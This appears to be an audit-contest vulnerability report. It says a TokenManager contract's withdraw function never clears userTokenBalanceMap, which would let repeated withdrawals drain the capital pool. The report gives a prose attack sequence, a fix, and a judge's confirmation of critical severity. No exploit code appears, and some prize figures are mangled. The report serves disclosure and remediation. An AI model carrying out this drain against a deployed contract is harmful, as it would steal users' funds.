Submission Details
Severity:
Users can withdraw as much as they want
## Summary
The users can withdraw as much as they want.
## Vulnerability Details
The users can withdraw as much as they want because the `userTokenBalanceMap` is not reset after the `withdraw` function is called in the `TokenManager` contract.
Attack Vector:
1. The user creates an offer and deposits 1 ETH into capital pool.
2. The user cancels his offer, allowing him to withdraw 1 ETH. `userTokenBalanceMap[_msgSender()][wrappedNativeToken][MakerRefund] = 1 eth`
3. The user repeatedly calls the `withdraw` function until the `TokenManager` contract's balance reaches 0.
This attack scenario can also be exploited with ERC20 tokens.
## Impact
All funds can be drained.
## Tools Used
Manual Review
## Recommendations
After withdrawing reset the `userTokenBalanceMap`.
Updates
Lead Judging Commences
0xnevi 11 months ago
Submission Judgement Published Assigned finding tags:
finding-TokenManager-withdraw-userTokenBalanceMap-not-reset
Valid critical severity finding, the lack of clearance of the `userTokenBalanceMap` mapping allows complete draining of the CapitalPool contract. Note: This would require the approval issues highlighted in other issues to be fixed first (i.e. wrong approval address within `_transfer` and lack of approvals within `_safe_transfer_from` during ERC20 withdrawals)
Prize pool breakdown
Total prize
30,000 USDC
nSLOC
1,22924 USDC / LOC
25,000 USDC
2,750 USDC
2,250 USDC
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.